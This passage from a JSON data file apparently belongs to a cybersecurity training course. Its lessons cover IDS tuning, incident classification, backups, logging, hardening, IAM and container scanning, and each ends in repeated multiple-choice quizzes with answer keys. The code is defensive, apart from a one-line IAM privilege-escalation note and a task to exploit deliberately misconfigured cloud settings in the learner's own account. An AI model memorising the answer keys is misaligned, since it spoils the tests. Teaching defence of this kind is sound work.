by: whitelisting known-good traffic, adjusting thresholds, suppressing noisy rules, and creating custom rules for your environment."},{"type":"code","lang":"bash","content":"# Suricata rule suppression\nsuppress gen_id 1, sig_id 2001219, track by_src, ip 10.0.0.0/24\n# Threshold (alert once per 60s per source)\nthreshold gen_id 1, sig_id 2001219, type limit, track by_src, count 1, seconds 60"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"IDS tuning reduces...","opts":["Detection capability","False positives (noise) without missing real attacks","Log volume only","Network speed"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-incident-classification","cat":"Defense & Blue Team","title":"Incident Classification & Severity","diff":1,"xp":75,"intro":"Categorize incidents by type and severity for appropriate response.","sections":[{"type":"text","content":"Classification: malware, phishing, unauthorized access, data breach, DoS. Severity: P1 (critical \u2014 active breach), P2 (high \u2014 confirmed threat), P3 (medium \u2014 suspicious activity), P4 (low \u2014 policy violation)."},{"type":"code","lang":"bash","content":"# P1 Critical: active data exfiltration, ransomware spreading\n#   Response: all hands, 15-min updates, executive notification\n# P2 High: confirmed malware, compromised credentials\n#   Response: IR team engaged, 1-hour updates\n# P3 Medium: suspicious login, policy violation\n#   Response: analyst investigation, next business day\n# P4 Low: port scan, info-level alert\n#   Response: log and monitor"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"A P1 incident means...","opts":["Low priority","Critical \u2014 active breach requiring immediate all-hands response","Medium priority","Informational"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-backup-security","cat":"Defense & Blue Team","title":"Backup Security & Recovery","diff":1,"xp":75,"intro":"Backups are your last line of defense \u2014 protect them.","sections":[{"type":"text","content":"3-2-1 rule: 3 copies, 2 different media, 1 offsite. Test restores regularly. Protect backups from ransomware (immutable storage, air-gapped copies)."},{"type":"code","lang":"bash","content":"# 3-2-1 backup rule:\n# 3 copies of data\n# 2 different storage types (disk + cloud)\n# 1 offsite/offline copy\n# Protection:\n# Immutable storage (S3 Object Lock, WORM)\n# Separate credentials from production\n# Test restores quarterly"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"The 3-2-1 backup rule requires...","opts":["3 servers","3 copies, 2 media types, 1 offsite","3 encryption keys","3 passwords"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-log-centralization","cat":"Defense & Blue Team","title":"Log Centralization Architecture","diff":2,"xp":150,"intro":"Collect logs from every source into one searchable platform.","sections":[{"type":"text","content":"Architecture: agents/syslog on endpoints -> log aggregator (Logstash/Fluentd) -> storage (Elasticsearch) -> search/dashboard (Kibana/Grafana)."},{"type":"code","lang":"bash","content":"# rsyslog forwarding to central server\n*.* @siem.company.com:514\n# Filebeat agent (logs -> Elasticsearch)\nfilebeat.inputs:\n- type: log\n  paths: ['/var/log/*.log']\noutput.elasticsearch:\n  hosts: ['siem:9200']"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Centralized logging is critical because...","opts":["It saves disk space","Attackers can't delete logs if they're forwarded to a central SIEM","It's faster","It encrypts logs"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-security-metrics","cat":"Defense & Blue Team","title":"Security Metrics & KPIs","diff":2,"xp":150,"intro":"Measure your security program's effectiveness.","sections":[{"type":"text","content":"Key metrics: MTTR (mean time to remediate), MTTD (mean time to detect), patch compliance %, vulnerability aging, phishing click rate, incidents per month."},{"type":"code","lang":"bash","content":"# Key metrics to track:\n# MTTD: how long until an attack is detected? (goal: <24h)\n# MTTR: how long to remediate? (goal: critical <48h)\n# Patch compliance: % of systems patched within SLA\n# Vulnerability aging: avg days open\n# Phishing: click rate per campaign\n# Coverage: % of systems sending logs to SIEM"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"MTTD measures...","opts":["Patch speed","How long until an attack is detected","Firewall rules","User satisfaction"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-hardening-checklist","cat":"Defense & Blue Team","title":"Server Hardening Checklist","diff":1,"xp":100,"intro":"Essential hardening steps for any new server.","sections":[{"type":"text","content":"1. Update/patch. 2. Remove unnecessary services. 3. Configure firewall. 4. Harden SSH. 5. Set up logging. 6. Configure NTP. 7. File permissions. 8. Install fail2ban."},{"type":"code","lang":"bash","content":"# Quick hardening checklist:\napt update && apt upgrade -y\nsystemctl disable avahi-daemon cups\nufw enable && ufw default deny incoming\nsed -i 's/PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config\napt install fail2ban auditd\ntimedatectl set-ntp true"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"The first hardening step is...","opts":["Install monitoring","Update and patch the system","Configure the firewall","Disable SSH"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cl-iam-policies","cat":"Cloud & Container","title":"IAM Policy Analysis","diff":2,"xp":150,"intro":"Read and understand IAM policies to find overpermissions.","sections":[{"type":"text","content":"IAM policies define who can do what. Look for: Action: *, Resource: *, wildcard principals, and policies that grant admin indirectly."},{"type":"code","lang":"bash","content":"# AWS: list policies and check for wildcards\naws iam list-policies --scope Local\naws iam get-policy-version --policy-arn ARN --version-id v1\n# Dangerous: {\"Effect\":\"Allow\",\"Action\":\"*\",\"Resource\":\"*\"}\n# Also dangerous: iam:PassRole + lambda:CreateFunction = privesc"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Action: * with Resource: * means...","opts":["Read-only","Full admin access to everything","Limited access","No access"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-container-scanning","cat":"Cloud & Container","title":"Container Image Vulnerability Scanning","diff":1,"xp":100,"intro":"Scan container images before deploying them.","sections":[{"type":"text","content":"Trivy, Snyk, and Grype scan Docker images for known vulnerabilities in OS packages and application dependencies."},{"type":"code","lang":"bash","content":"trivy image myapp:latest\nsnyk container test myapp:latest\ngrype myapp:latest\n# Scan in CI/CD pipeline before push\n# Block deployment if critical vulns found"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Container scanning should happen...","opts":["After deployment","Before deployment in the CI/CD pipeline","Never","Only monthly"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO 